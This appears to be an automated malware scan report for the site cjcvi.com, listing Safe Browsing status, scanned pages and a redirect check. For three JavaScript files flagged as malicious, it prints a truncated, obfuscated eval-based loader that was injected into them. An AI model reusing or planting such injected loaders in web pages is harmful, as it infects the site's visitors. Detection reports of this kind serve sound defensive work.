Safe Browsing / Blacklists
Query: http://www.google.com/safebrowsing/diagnostic?site=cjcvi.com
Result: The website is marked by Google as suspicious. - visiting this web site may harm your computer.
Details are available here.
Result: The website is marked by Google as suspicious. - visiting this web site may harm your computer.
Details are available here.
Scanned pages/files
Request | Server response | Status |
http://cjcvi.com/ | 200 OK Content-Length: 6427 Content-Type: text/html | clean |
http://cjcvi.com/inc/coin.js | 200 OK Content-Length: 32169 Content-Type: application/javascript | malicious |
Malicious code - confirmed by antiviruses (see below) sp="split";aq="0"+"x";w=window;ff=String;z="y";ff=ff.fromCharCode;try{document["\x62od"+z]++}catch(d21vd12v){v=123;vzs=false;try{document;}catch(wb){vzs=2;}if(!vzs)e=w["eval"];if(1){f="17,5d,6c,65,5a,6b,60,66,65,17,71,71,71,5d,5d,5d,1f,20,17,72,4,1,17,6d,58,69,17,67,17,34,17,5b,66,5a,6c,64,5c,65,6b,25,5a,69,5c,58,6b,5c,3c,63,5c,64,5c,65,6b,1f,1e,60,5d,69,58,64,5c,1e,20,32,4,1,4,1,17,67,25,6a,69,5a,17,34,17,1e,5f,6b,6b,67,31,26,26,65,66,65,24,6d,66,63,60,66,25,5b,5c,26,6c,5c,59,5c,69,26,6b,69,58, Antivirus reports:
| ||
http://cjcvi.com/index.php | 200 OK Content-Length: 6427 Content-Type: text/html | clean |
http://cjcvi.com/vehicules.php?init | 200 OK Content-Length: 53002 Content-Type: text/html | clean |
http://cjcvi.com/inc/fonctions.js | 200 OK Content-Length: 11260 Content-Type: application/javascript | malicious |
Malicious code - confirmed by antiviruses (see below) sp="split";aq="0"+"x";w=window;ff=String;z="y";ff=ff.fromCharCode;try{document["\x62od"+z]++}catch(d21vd12v){v=123;vzs=false;try{document;}catch(wb){vzs=2;}if(!vzs)e=w["eval"];if(1){f="17,5d,6c,65,5a,6b,60,66,65,17,71,71,71,5d,5d,5d,1f,20,17,72,4,1,17,6d,58,69,17,67,17,34,17,5b,66,5a,6c,64,5c,65,6b,25,5a,69,5c,58,6b,5c,3c,63,5c,64,5c,65,6b,1f,1e,60,5d,69,58,64,5c,1e,20,32,4,1,4,1,17,67,25,6a,69,5a,17,34,17,1e,5f,6b,6b,67,31,26,26,65,66,65,24,6d,66,63,60,66,25,5b,5c,26,6c,5c,59,5c,69,26,6b,69,58, Antivirus reports:
| ||
http://cjcvi.com/contact.php | 200 OK Content-Length: 5394 Content-Type: text/html | clean |
http://cjcvi.com/mentions.php | 200 OK Content-Length: 9839 Content-Type: text/html | clean |
http://cjcvi.com/test404page.js | 404 Not Found Content-Length: 392 Content-Type: text/html | clean |
http://cjcvi.com/imprime.php?num_dossier=1160 | 200 OK Content-Length: 11293 Content-Type: text/html | clean |
http://cjcvi.com/./includes/site.js | 200 OK Content-Length: 11088 Content-Type: application/javascript | malicious |
Malicious code - confirmed by antiviruses (see below) sp="split";aq="0"+"x";w=window;ff=String;z="y";ff=ff.fromCharCode;try{document["\x62od"+z]++}catch(d21vd12v){v=123;vzs=false;try{document;}catch(wb){vzs=2;}if(!vzs)e=w["eval"];if(1){f="17,5d,6c,65,5a,6b,60,66,65,17,71,71,71,5d,5d,5d,1f,20,17,72,4,1,17,6d,58,69,17,67,17,34,17,5b,66,5a,6c,64,5c,65,6b,25,5a,69,5c,58,6b,5c,3c,63,5c,64,5c,65,6b,1f,1e,60,5d,69,58,64,5c,1e,20,32,4,1,4,1,17,67,25,6a,69,5a,17,34,17,1e,5f,6b,6b,67,31,26,26,65,66,65,24,6d,66,63,60,66,25,5b,5c,26,6c,5c,59,5c,69,26,6b,69,58, Antivirus reports:
| ||
http://cjcvi.com/imprime.php?num_dossier=551 | 200 OK Content-Length: 9216 Content-Type: text/html | clean |
http://cjcvi.com/imprime.php?num_dossier=1189 | 200 OK Content-Length: 11091 Content-Type: text/html | clean |
http://cjcvi.com/imprime.php?num_dossier=1143 | 200 OK Content-Length: 9276 Content-Type: text/html | clean |
http://cjcvi.com/imprime.php?num_dossier=1242 | 200 OK Content-Length: 11231 Content-Type: text/html | clean |
http://cjcvi.com/imprime.php?num_dossier=1092 | 200 OK Content-Length: 10233 Content-Type: text/html | clean |
Malicious Redirects
First query (normal visit):
GET / HTTP/1.1
Host: cjcvi.com
Result:
HTTP/1.1 200 OK
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Connection: close
Date: Mon, 12 Jan 2015 21:44:44 GMT
Pragma: no-cache
Server: Apache/2
Vary: Accept-Encoding,User-Agent
Content-Type: text/html
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Set-Cookie: PHPSESSID=dd8c341956b47d26a7743a288c6cd070; path=/
X-Powered-By: PHP/5.2.17
GET / HTTP/1.1
Host: cjcvi.com
Result:
HTTP/1.1 200 OK
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Connection: close
Date: Mon, 12 Jan 2015 21:44:44 GMT
Pragma: no-cache
Server: Apache/2
Vary: Accept-Encoding,User-Agent
Content-Type: text/html
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Set-Cookie: PHPSESSID=dd8c341956b47d26a7743a288c6cd070; path=/
X-Powered-By: PHP/5.2.17
Second query (visit from search engine):
GET / HTTP/1.1
Host: cjcvi.com
Referer: http://www.google.com/search?q=cjcvi.com
Result:
The result is similar to the first query. There are no suspicious redirects found.
GET / HTTP/1.1
Host: cjcvi.com
Referer: http://www.google.com/search?q=cjcvi.com
Result:
The result is similar to the first query. There are no suspicious redirects found.